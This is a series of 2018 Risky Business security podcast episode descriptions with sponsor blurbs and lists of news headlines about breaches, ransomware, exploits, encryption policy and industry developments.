With that in mind this week we’ve got two fantastic interviews for you. We’ll be chatting with Dr. Silvio Cesare in this week’s feature interview. Silvio’s dusted off his bug hunting hat and he’s taken to Twitch-streaming his auditing sessions. Dave Aitel described watching Silvio’s Twitch stream as like seeing a Titan ransack a small Greek village. Five months, 100 bugs, 50 of them in kernel stuff.

He’s doing this for a couple of reasons – he wants to show people how it’s done, and he wants people to realise there are still lots of bugs out there to be found. We’ll chat to him about that in this week’s feature.

This week’s sponsor interview is with another old school hacker, Stephen Ridley. Stephen is the founder of Senrio, which is technically an IoT security play, but the thing is the tech he’s developed has turned out to be useful for all sorts of other stuff too.

Senrio is another one of those hacker-led startups in the spirit of Duo Security or Thinkst Canary. Stephen is a really well respected guy and this week he’s joining us to talk about a bunch of stuff. A lot of it is related to the unexpected uses for Senrio’s monitoring platform. He built a classifier for network-connected devices as a part of Senrio’s IoT security platform, and it turns out it’s actually running rings around a bunch of Enterprise Asset Management tools. People are actually using his IoT security monitoring solution to do asset management and figure out install gaps for their EDR solutions.

Totally not what he intended people to use it for, but hey, a win’s a win. So Stephen joins us this week to talk about that, also to talk about recent developments in the IoT space and really a bunch more stuff.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

Amazon Web Services starts blocking domain-fronting, following Google’s lead - The Verge
Iran blocks Telegram, pushes replacement with “Death to America” emoji | Ars Technica
Chinese Authorities Accidentally Admit to Accessing Deleted WeChat Messages
As two Koreas shake hands, Hidden Cobra hackers wage espionage campaign | Ars Technica
North Korea's Elites Are Ditching Facebook for Chinese Social Networks
After data “clash” report, WhatsApp founder says he’s leaving Facebook | Ars Technica
Can This System of Unlocking Phones Crack the Crypto War?
Ray Ozzie’s plan for unlocking encrypted phones gets a chilly reception | Ars Technica
Matthew Green on Twitter: "This article on WhatsApp suggests that WhatsApp might be weakening its encryption, but doesn’t give any details. That’s pretty worrying. https://t.co/2LfWeqMMPt https://t.co/3n8GDxVLcT"
Tens of Thousands of Malicious Apps Using Facebook APIs | Threatpost | The first stop for security news
Intel Committee blasts FBI for not notifying Russian hacking victims - Cyberscoop
Startup Offers $3 Million to Anyone Who Can Hack the iPhone - Motherboard
This Russian Company Sells Zero-Day Exploits for Hospital Software - Motherboard
Google and Microsoft ask Georgia governor to veto 'hack back' bill
Joy Reid Blames Hackers, Just Like Everyone Else | WIRED
Security Trade-Offs in the New EU Privacy Law — Krebs on Security
A One-Minute Attack Let Hackers Spoof Hotel Master Keys | WIRED
Volkswagen and Audi Cars Vulnerable to Remote Hacking
Charlie Miller on Twitter: "Cool new research out on car hacking: https://t.co/sZ2v0GpwWy. Hang on or mute as I'll give my thoughts on it."
Lojack Becomes a Double-Agent
Europol shuts down one of the largest DDoS marketplaces in the world - CyberScoop
Police Have Seized Revenge Porn Site Anon-IB - Motherboard
Chinese Police Arrest 15 People Who Hid Malware Inside PUBG Cheat Apps
GitHub Accidentally Recorded Some Plaintext Passwords in Its Internal Logs
Starting Today, Google Chrome Will Show Warnings for Non-Logged SSL Certificates
Long Prison Sentence for Man Who Hacked Jail Computer System to Bust Out Friend
State threat-sharing center warns of multiple PHP vulnerabilities - CyberScoop
Escalating Privileges with CylancePROTECT — Atredis Partners
Hackers Scan the Web for Vulnerable WebLogic Servers After Oracle Botches Patch
silviocesare - Twitch
Senrio
May 02, 2018
Risky Business #496 -- The China supply chain problem

On this week’s show we hear from Jennifer Bisceglie, the CEO of Interos Solutions, a company that recently prepared a report on supply chain security for the US government’s US-China Economic and Security Review Commission. Risky Business contributor Brian Donohue caught up with Jennifer to talk about the report and really get an idea of what supply chain risks look like from a macro level. The long and the short of it is the supply chain is already very, very opaque, so governments and the private sector will have to work pretty hard to mitigate the risks involved here.

This week’s show is brought to you by Netsparker, the web application security scanning toolmaker. Netsparker was founded nine years ago by this week’s sponsor guest, Ferruh Mavituna. He was a pentester who created Netsparker to help him with his own work. But just recently they raised a bundle of cash: US$40m. We’ll catch up with him and find out if a webapp scanning company with $40m is like the mule with the spinning wheel. It certainly seems like Ferruh has some ambitious plans. We haven’t seen this sort of money being raised by comparable companies so it’s definitely interesting stuff.

In this week’s news we cover off:

  • Mysterious BGP route hijacking for lame Ether theft (??)
  • Google disabling domain fronting
  • Canadian teen charged with downloading documents from a website
  • City of Atlanta spending $2.6m to recover from its ransomware event
  • RSA’s conference app fail
  • White House chaos over Rob Joyce replacement (MAGA!!! MAGAAAAAA!!!!!)
  • Much more

The show notes/links are below, and you can follow Adam, Brian or Patrick on Twitter if that’s your thing.

Show notes

Suspicious event hijacks Amazon traffic for 2 hours, steals cryptocurrency | Ars Technica
Google disables domain-fronting, removing ability to bypass state-level firewalls - Neowin
Teen charged in Nova Scotia government breach says he had 'no malicious intent' | CBC News
Atlanta Spent $2.6M to Recover From a $52,000 Ransomware Scare | WIRED
Seamus Hughes on Twitter: "A beautiful circle: Company gets ransomwared. Hires IT company to fix it. Unlocks system in record time. FBI figures out the IT company just paid the bitcoin ransom.… https://t.co/7Vrd04GeSA"
Nation-state hackers attempted to use Equifax vulnerability against DoD, NSA official says
Richard Bejtlich on Twitter: "A million times, this. The "basic cyber hygiene" thesis drives me crazy. It's the epitome of static, time-ignorant thinking. "Hygiene" may work against mindless one-shot malware, or one-trick pony script kiddies. It has no place in serious conversations about targeted intrusions.… https://t.co/EtyiHKM0sF"
DNC Lawsuit Against Russia Reveals New Details About 2016 Hack | WIRED
(tech)Darko||Dan on Twitter: "Apparently @RSAConference isn't giving out maps to Expo attendees anymore - they require you to install their app which wants access to everything short of installing a rootkit on your phone. Are you kidding me @RSAsecurity?… https://t.co/QCQeAhzbv5"
RSA conference app leaks user data
SEC fines Yahoo remnant Altaba $35 million for failing to disclose breach
These Ex-Spies Are Harvesting Facebook Photos For A Massive Facial Recognition Database
The Cat-and-Mouse Game Between Apple and the Manufacturer of an iPhone Unlocking Tool - Motherboard
Someone Is Trying to Extort iPhone Crackers GrayShift With Leaked Code - Motherboard
The NSA now officially has a new chief
Trump sends cyberwar strategy to Congress
A cybersecurity power struggle is brewing at the National Security Council
Microsoft-led industry group pledges to not assist government cyberattacks - Cyberscoop
Kaspersky Lab banned from advertising on Twitter
U.S. government weighing sanctions against Kaspersky Lab
Sentencing delayed for FSB's email-popping hacker pawn
Introducing Microsoft Azure Sphere: Secure and power the intelligent edge | Blog | Microsoft Azure
“Drupalgeddon2” touches off arms race to mass-exploit powerful Web servers | Ars Technica
‘Orangeworm’ hacking campaign hits X-ray and MRI machines
Icelandic bitcoin heist suspect arrested in Amsterdam after leaving prison | Ars Technica
A bunch of Red Pills: VMware Escapes | Keen Security Lab Blog
Spoofing Cell Networks with a USB to VGA Adapter | Hackaday
Google Translate
Avast reveals more information detailing how hackers compromised CCleaner | V3
New hacks siphon private cryptocurrency keys from airgapped wallets | Ars Technica
[TITLE] - AARP Research Report
Apr 25, 2018
Risky Business #495 -- Russian Internet users are having a bad time

We’re still running in a trimmed down format this week, sorry about that. Regular listeners would know we’ve been dealing with some unexpected stuff over here in the house of Business, but the good news is things have settled down and we’re actually back home after more than three weeks away. Things are looking good for a return to a full format show either next week or the week after.

But don’t worry, there’s plenty of good stuff in this week’s news segment with Mark Piper, including:

  • Russia blocking 15m cloud service IPs to shut down Telegram
  • RU router hax: Are they a big deal?
  • FBI’s “going dark” narrative questioned
  • Rob Joyce departs White House
  • ZTE in all sorts of trouble
  • AND MOAR

This week’s show is brought to you by Cylance. Jim Walter of Cylance will be along in this week’s sponsor interview to talk about a couple of things – we’ll be looking at “fileless” malware – for what it’s worth it’s a term that we both hate – and we’ll also be talking about how complete amateurs are now able to run reasonably sophisticated malware campaigns these days thanks to the badware for hire business getting even more slick.

The show notes/links are below, and you can follow Pipes or Patrick on Twitter if that’s your thing.

Show notes

In effort to shut down Telegram, Russia blocks Amazon, Google network addresses | Ars Technica
Anatoly Rosencrantz on Twitter: "over night russian authorities are blocking about 2 000 000 IPs of Amazon and Google. Everyone thought it’s a mistake, until RKN head Zharov confirmed it is not. Tactics: to force Google and Amazon push Telegram out of their clouds by blocking basically whole cloud for Russia… https://t.co/8bZOtMENbp"
US, UK Accuse Russia of Hacking Home Routers and ISPs to Conduct MitM Attacks
Lawmakers Call FBI's 'Going Dark' Narrative 'Highly Questionable' After Motherboard Shows Cops Can Easily Hack iPhones - Motherboard
Congress wants answers on FBI's 'going dark' problem in wake of DOJ IG report
Cybersecurity adviser Rob Joyce to leave White House, return to NSA
Bolton will lead charge to replace cybersecurity coordinator, DHS secretary says
Rob Joyce on Twitter: "EU's GDPR is going to undercut a key tool for identifying malicious domains on the internet. WHOIS database will be noncompliant, or have to purge the data that makes it useful to find bad actors. @briankrebs is spot on. Cyber criminals are celebrating GDPR.… https://t.co/FfYHhERdTY"
Update: Zuckerberg Said He ‘Misspoke’ About Alerting Campaigns to Russian Hacking Attempts - Motherboard
Deleted Facebook Cybercrime Groups Had 300,000 Members — Krebs on Security
Intel to Allow Antivirus Engines to Use Integrated GPUs for Malware Scanning
Chinese Mobile Device Maker ZTE Banned From Buying U.S. Goods
Hamas-linked spyware targeting Palestinians removed from Google Play store
FTC: "Warranty Void If Removed" Stickers Are Illegal
Barclays Bank plc - ASA | CAP
NIST releases updated cybersecurity framework
Researchers Rickrolled Emergency Alert Sirens in Proof-of-Concept Hack - Motherboard
Exploitation of Drupalgeddon2 Flaw Starts After Publication of PoC Code
Yubico Delivers Passwordless Login for Enterprise Authentication on Windows 10 Devices | Yubico
The Teens Who Hacked Microsoft's Xbox Empire—And Went Too Far | WIRED
Senior Manager of Research and Development: Careers | Duo Security
Welcome to Mars
Cylance | Artificial Intelligence Based Advanced Threat Prevention
Apr 18, 2018
Risky Business #494 -- Cisco customers have a bad week, plus a deep dive on WebAuthn

Regular listeners would know Risky Business is just running the news and sponsor segments at the moment so there’s no feature interview in this week’s show. But that’s fine because we’ve got plenty to get through in the news segment with Adam Boileau.

Then we’ve got a killer sponsor interview for you this week with Nick Steele and James Barclay of Duo Security.

They’re here to talk about WebAuthn. It’s the new authentication spec currently going through the W3C process. Both Nick and James will be along later to talk about what the spec is designed to do, how it works and what its chances of becoming mainstream are, and spoiler alert, those chances are pretty good.

They’ve also provided me with some links for people out there who want to play around with WebAuthn; they are below.

Links to all the news items are also below, and you can follow Patrick or Adam on Twitter if that floats your boat.

Show notes

Nation-state hackers hit Cisco switches - Cyberscoop
"Don’t Mess With Our Elections": Vigilante Hackers Strike Russia, Iran - Motherboard
With trade war looming, Chinese cyberattacks may follow - CyberScoop
Police could access US cloud data under planned crime-fighting deal
DHS defends media-monitoring database, calls critics “conspiracy theorists” | Ars Technica
Alex Ionescu on Twitter: "I generally wasn't opposed to the idea of Chrome making sure that people's documents/downloads weren't full of latent ransomware. But pegging my CPU as you run... f*cking... ESET... on my entire drive? I'm glad I switched to Edge on my desktop PC, I guess it's time for the laptop https://t.co/PHNn7gT583"
After Crackdown, Neo-Nazis Are Hosting Propaganda on Censor-Proof Networks - Motherboard
Chinese Government Forces Residents To Install Surveillance App With Awful Security - Motherboard
A Long-Awaited IoT Crisis Is Here, and Many Devices Aren't Ready | WIRED
DARPA is looking to avoid another version of Meltdown or Spectre - CyberScoop
This Tool Can Help Identify Leakers Who Copy and Paste Secret Info - Motherboard
T-Mobile Stores Part of Customers' Passwords In Plaintext, Says It Has 'Amazingly Good' Security - Motherboard
Beware of Bing Chrome Download Ads Pushing Adware/PUP Installers
Three Execs Get Prison Time for Pirating Oracle Firmware Patches
Russia Readies Telegram Ban After App Refused to Hand Over Encryption Keys to FSB
VirusTotal Launches Droidy, Its New Android Sandbox Technology
Researchers Hijack Over 2,000 Subdomains From Legitimate Sites in CloudFront Experiment
Tavis Ormandy on Twitter: "This is amazing, Windows Defender used the open source unrar code, but changed all the signed ints to unsigned for some reason, breaking the code. @halvarflake noticed and got it fixed. Remote SYSTEM memory corruption 😨 https://t.co/gsx9ZMk1Hz"
Australia's Offensive Cyber Capability | Australian Strategic Policy Institute | ASPI
Josh Marshall on Twitter: "oh look "security expert" Rudy Giuliani shows you how to do a special "dark web scan", courtesy of Experian. https://t.co/8DIlUY56Lu"
GitHub - duo-labs/webauthn: A Demonstration of the WebAuthn Specification
GitHub - duo-labs/py_webauthn: A WebAuthn Python module.
WebAuthn.io
ImperialViolet - Security Keys
Web Authentication: An API for accessing Public Key Credentials Level 1
Using Hardware Token-based 2FA with the WebAuthn API – Mozilla Hacks – the Web developer blog
Trying Out Web Authentication (WebAuthn)
Web Authentication: What It Is and What It Means for Passwords | Duo Security
Apr 10, 2018
Risky Business #493 -- SWIFT, pipeline attacks, Chrome's AV feature and more

This week’s show is just the news segment and sponsor interview. But, as always, there’s plenty to discuss with our news guest Adam Boileau!

In this week’s sponsor interview we’ll be hearing from Timothy Keeler from Remediant.

Remediant is a small but growing company that does privileged account management stuff, but they’re not a password vault. Tim’s joining us this week to walk through some of the challenges of managing privileged access in devops environments and also to talk a bit about some of the challenges around single sign on and privilege management. It’s all good stuff, and it’s coming up after the news.

Links to all the news items are below, and you can follow Patrick or Adam on Twitter if that floats your boat.

Apr 04, 2018
Risky Biz Soap Box: Network detection is dead! Long live network detection!

This Soap Box edition is brought to you by ICEBRG.

ICEBRG is in the business of network-based response and detection. In simple terms they drop a box on your network that strips network metadata and shunts it up to their cloud for analysis. This allows incident responders in particular to really, really speed up their investigations. We know that a lot of internet traffic is encrypted these days, and that’s made some people take their eye off the network ball. The focus and buzz these days is very much on endpoint detection and response. Our guest on this edition of Soap Box, ICEBRG’s VP of Strategic Partnerships Jason Rebholz, thinks we’ve wound up with a blind spot as a result.

It’s true that a lot of network security tech fell behind the times, but there are some fresh approaches emerging these days that are pretty bloody useful. ICEBRG started off as a product to accelerate incident response; an example use case is deploying it in 15 minutes when you’re starting an IR job, and it gives you amazing visibility for the time invested. But they’re broadening the product a bit these days. They’re not turning it into an IDS, but they’re able to give clients some very, very high quality signalling. I think this is what you get when you get a bunch of ex-govvies and incident responders together and they develop a product. Their alerts are more along the lines of “you’re owned by this APT group”, not so much “hmm, that’s some strange ICMP traffic hitting your mail server. Maybe some router in Azerbaijan needs a reboot.”

So the thinking is definitely fresh, and I’m increasingly seeing companies play in the network security space again. Network detection is dead! Long live network detection!

Show notes

Apr 02, 2018
Risky Business #492 -- Thomas Rid on sloppy active measures

Sorry this week’s show is late – I found myself taking an unexpected and unavoidable trip. But I’m back on deck and we’ve got a great show for you this week.

This week we hear from Thomas Rid, Professor of Strategic Studies at Johns Hopkins University’s School of Advanced International Studies. We’re having a conversation inspired by the latest spectacular Russian intelligence blunder: a Russian SIGINT operator exposing their GRU headquarters’ IP address because they forgot to fire up their VPN when logging in to their Guccifer 2.0 persona accounts. Oops.

It’s hilarious stuff, but it’s brought out the conspiracy types who are saying hey, as if they’d make this mistake. Something’s fishy! Well, as you’ll hear, these types of agencies make similar mistakes on a pretty routine basis. Thomas joins us to talk about that, and also about how mistakes like this don’t really matter in the broad scheme of things. They’re a bit of a distraction.

This week’s show is brought to you by Bugcrowd, the managed bug bounty company. Bugcrowd’s founder and CTO Casey Ellis will be dropping by to talk about a few things. They’ve raised a stack of cash since we last spoke and they plan to spend it on a bunch of stuff – they’re working on doing more efficient triage and they’re also looking at creating better legal agreements between their customers and their researchers. That’s all interesting stuff, and it’s coming up later.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

A cyberattack hobbles Atlanta, and security experts shudder
City of Atlanta still crippled six days after ransomware attack - CNN
Boeing hit by WannaCry virus, fears it could cripple some jet production | The Seattle Times
EXCLUSIVE: ‘Lone DNC Hacker’ Guccifer 2.0 Slipped Up and Revealed He Was a Russian Intelligence Officer
Guccifer 2.0 Was Always Sloppy - Motherboard
Facebook denies it collects call and SMS data from phones without permission | TechCrunch
Facebook Wants Security Researchers to Hunt Down Apps That Misuse User Data
Report: Kaspersky Lab to open new data center in Switzerland to curb espionage suspicions
Eugene Kaspersky defends publishing 'Slingshot' report
US Charges Nine Iranians With Hacking Over 300 Universities
Iranian Hackers Charged Last Week Were Actually Pretty Damn Good Phishers
US Congress Passes CLOUD Act Hidden in Budget Spending Bill
CLOUD Act, Tucked Into Omnibus, Likely To Derail Supreme Court Tech Privacy Case : NPR
Four Alleged Associates of Sinaloa Cartel-Linked Encrypted Phone Company Are On the Run - Motherboard
Secure Phone Companies Clamp Down After Sinaloa Cartel-Linked Arrest - Motherboard
UK police mobile device extraction tech raises eyebrows, study
FBI Barely Tried to Hack San Bernardino iPhone Before Going to Court With Apple - Motherboard
FBI has a unit solely devoted to its 'going dark' problem
zeynep tufekci on Twitter: "That @theintercept story about Facebook used by ICE to track immigrants that went pretty viral? It wasn't an immigrant. It was a legal subpoena on a child exploitation/abuse case. (Incredible correction at the end!!!) Motivated reasoning isn't just a right-wing phenomenon. 1/x… https://t.co/dxYOPznkrA"
Minneapolis FBI agent charged with leaking classified information to reporter | Minnesota Public Radio News
How security alerts are keeping your code safer | The GitHub Blog
Ecuador Cut Off Julian Assange’s Internet For His Political Tirades on Twitter - Motherboard
Reddit Bans Subreddits Dedicated to Dark Web Drug Markets and Selling Guns - Motherboard
NSA has been tracking bitcoin users since 2013
Angry Users Donate $120K to Cancer Research After Brian Krebs' Coinhive Article
With cryptojacking rising, exploit kits rapidly decline - CyberScoop
IETF Approves TLS 1.3 as Internet Standard
Chrome Extension Detects URL Homograph (Unicode) Attacks
Drupal Fixes Drupalgeddon2 Security Flaw That Allows Hackers to Take Over Sites
Many VPN Providers Leak Customer's IP Address via WebRTC Bug
Microsoft's Meltdown patches introduced a whole new vulnerability
Cisco IOS XE Software Static Credential Vulnerability
Digital arms merchants selling products to Australian police forces? – Digital Rights Watch
pariscid.pl: fix nasty typo in CRYPTO_memcmp. · openssl/openssl@56d5a4b · GitHub
Nyotron-OilRig-Malware-Report-March-2018.pdf
Mar 29, 2018
Snake Oilers 5 part 2: Penten talks Honey Docs, Trend Micro on its latest

Snake Oilers is a wholly sponsored podcast where vendors pay to pitch their tech at you, the listeners. Last week we heard from Rapid7, Mimecast and VMRay, but this week we’ve got two more pitches for you. First up we’re going to hear from Penten, an Australian-based company that is doing some genuinely interesting stuff with honey documents.

Also in this edition we’ll be chatting with the team at Trend Micro. This isn’t really about pitching a product; it’s more about countering the messaging coming out of newer EDR companies, who are portraying established vendors like Trend Micro as out of touch.

As listeners would know, beating up the incumbent AV companies is one of my hobbies, so basically Trend Micro’s Eric Skinner and Eric Shulze will be along this week to tell me why I’m an idiot. They’re also going to make a strong case for independent AV testing – it’s something the industry has struggled with for a long time, but they say they want it to happen more than ever.

Mar 26, 2018
Risky Business #491 -- The biggest infosec news week we've ever seen

What a week, huh? As you’ll soon hear it’s been an absolute monster week for infosec news. Top of the list is the Cambridge Analytica scandal. For those who haven’t had time to catch up on this one, a former staffer from the data analytics firm has given some interviews in which he says the company scraped 50 million Facebook profiles and used that data to target US voters with political messages on behalf of Donald Trump’s campaign. Obviously this has made people feel quite uncomfortable, everyone is mad at Facebook and it’s news everywhere.

It also looks like Facebook CSO Alex Stamos is on his way out due to events entirely unrelated to this.

Also in this week’s show we’ve got:

  • Iranians trying to blow up Saudi Arabian chemical plants
  • Americans blaming Russia for attacks on its energy grid
  • Kaspersky blowing LIVE SOCOM ops against Al Qaeda and the remnants of Islamic State
  • The UK vowing to exact revenge on Russia via “cyber” retaliation over the Skripal affair

There is no feature interview in this week’s show, we’re going long on news, but this week’s sponsor interview is absolutely fantastic. It’s with Haroon Meer, head honcho over at Thinkst Canary.

He’s not here to talk about anything really related to products this week, instead we’re going to talk about CISO stuff. He’ll be thoughtlording the absolute sh*t out of you all this week.

Haroon thinks breached organisations are getting off too lightly in the current infosec climate because people are scared to victim shame. As you’ll hear, he thinks there are just no excuses for how some high profile data breaches have occurred, and says more CSOs should be prepared to die on the right hills to stop their companies engaging in straight up suicidal behaviour. It’s great for security to be an enabler, but that doesn’t mean signing off on whatever anyone wants to do.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

How Trump Consultants Exploited the Facebook Data of Millions - The New York Times
Ron Wyden on Twitter: "I wrote a letter to Mark Zuckerberg asking @facebook to detail the extent of misuse of its users’ private information:… https://t.co/9n121CCCtO"
Revealed: Trump’s election consultants filmed saying they use bribes and sex workers to entrap politicians – Channel 4 News
Facebook told to pull auditors from Cambridge Analytica’s offices
Cambridge Analytica CEO Alexander Nix Suspended Amid Scandals | WIRED
Facebook Exit Hints at Dissent on Handling of Russian Trolls - The New York Times
Nicole Perlroth on Twitter: "Full story publishing soon. Despite this PR-approved tweet, Stamos told hire ups he plans to leave FB in August. For the next few months, his role has been relegated to managing a small red team in SF, transitioning his group over to Guy Rosen and Pedro Canahuati, and tweeting.… https://t.co/XTbFHxRLRs"
Facebook security chief Alex Stamos leaked audiotape
A Cyberattack in Saudi Arabia Had a Deadly Goal. Experts Fear Another Try. - The New York Times
In a first, U.S. blames Russia for cyber attacks on energy grid
Russian spy attack: how likely is a British cyber offensive against Putin's regime?
Adrian Lamo, ‘Homeless Hacker’ Who Turned in Chelsea Manning, Dead at 37 — Krebs on Security
Kaspersky's 'Slingshot' report burned an ISIS-focused intelligence operation
Telegram loses appeal over encryption keys in Russia
Communications network of choice for Australian criminals shut down
Child abuse imagery found within bitcoin's blockchain | Technology | The Guardian
FBI raids home of suspected spy agency leaker - CNN
Svitzer employee details stolen in data breach affecting almost half of its Australian employees - ABC News (Australian Broadcasting Corporation)
Safari, Microsoft Edge exploits earn hackers $162k at Pwn2Own
China Bans People With Low "Social Credit" From Planes and Trains
Mar 21, 2018